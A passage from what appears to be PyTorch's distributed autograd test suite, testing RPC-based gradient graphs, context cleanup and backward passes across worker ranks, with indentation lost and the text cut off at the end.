def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
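        # Round-robin over the peer ranks, skipping self.rank. For example, with
        # world_size == 3 and self.rank == 1, successive calls return 2, 0, 2, 0, ...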
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
class DistAutogradTest(CommonDistAutogradTest):
@dist_init
def test_autograd_context(self):
# Verify max possible id.
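        # The context id packs the 16-bit worker id into the top bits and a
        # 48-bit auto-increment counter into the low bits, so the largest
        # counter value is 2**48 - 1 == 281474976710655.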
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
    # For the current context, this rank sends t1 and t2 tensors to dst_rank,
    # then gets back the result tensor t3 = torch.add(t1, t2).
    # For the current context on this rank, it expects a graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
    # For a context passed down from previous nested chain calls, this rank
    # receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
    # the result tensor t3 back.
    # For this context on this rank, it expects a graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
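    # Note: the checks below expect both AddBackward0 inputs to point at the
    # same RecvRpcBackward node, presumably because t1 and t2 arrive in a single
    # RPC message and therefore share one recv function.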
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
    # For a context passed down from previous nested chain calls, this rank
    # receives two tensors t1 and t2 and forwards them to the next dst via a
    # nested rpc call. On the return route, it receives the result tensor t3
    # from the next dst and forwards it back to the previous caller.
    # For this context on this rank, it expects a graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
        # For the send function created when making the nested rpc call,
        # its next functions are the two recv functions for the two tensors
        # received from the previous call.
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
        # For the send function created when returning the response to the
        # previous call, its next function is the recv function for the result
        # tensor returned from the nested call.
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
            # For self.rank, there are 4 graphs to verify:
            # The first is for the current context id, when this rank sends the
            # first rpc call.
            # The second is for the prev context id, when this rank makes the
            # 1st nested call.
            # The third is for the prev prev context id, when this rank makes
            # the 2nd nested call.
            # The last is for the prev prev prev context id, when this rank
            # executes the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
            # Verify the last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
            # For self.rank, there are 2 graphs to verify.
            # One is for the current context id, when this rank sends the first
            # rpc call and executes the torch.add() operator.
            # The other is for the prev context id, when this rank makes the
            # nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
            # NB: RRef.to_here() always passes the autograd context to the
            # callee, as the caller does not know whether the return value
            # would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
            # Verify the appropriate tensors have been attached to the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Test that in dist autograd, even when the tensors communicated over RPC
        # do NOT require grad, we still clean up the dist autograd contexts created
        # on other nodes. This is because the autograd context is still
        # communicated over RPC even if the tensor arguments do not require grad,
        # as it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
        # There should be at least one send and one recv event each, corresponding to the send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
        # The CPU total for the backward event should be greater than send and recv,
        # since applying those functions in the backward pass is a subset of the
        # entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
    # The current rank first creates a tensor on the rref_owner, and then passes
    # the rref with another tensor to the callee to run either my_rref_add or
    # my_nested_rref_add, depending on whether the callee is the rref owner.
    # The grad of the local tensor lives on the current rank, and the grad of
    # the rref tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
    # In this test, every rank serves as a parameter server (ps) and a driver,
    # and kicks off trainers on the other three ranks. So, we have:
    # ps = rank0 with trainers = rank1/2/3
    # ps = rank1 with trainers = rank2/3/0
    # ps = rank2 with trainers = rank3/0/1
    # ps = rank3 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
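    # For example, with self.rank == 2 and world_size == 4, the rank_diffs
    # [1, 2, 3] used below map to trainer ranks (2 + diff) % 4 == 3, 0, 1.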
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
        # Check that the trainers are done with their backward pass.
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
        # TODO: needs more investigation.
        # There is an rref leak when shutting down; we suspect it is because the
        # rref passed as an arg crosses the pybind boundary and is not garbage
        # collected by Python when calling shutdown().
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
            # We don't use the result of the RPC function; as a result, the
            # backward pass would hang in "FAST" mode.
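            # (The FAST-mode algorithm, as described in PyTorch's distributed
            # autograd design notes, assumes every send function will receive a
            # gradient during the backward pass; an unused RPC result breaks
            # that assumption.)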
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
IS_MACOS,
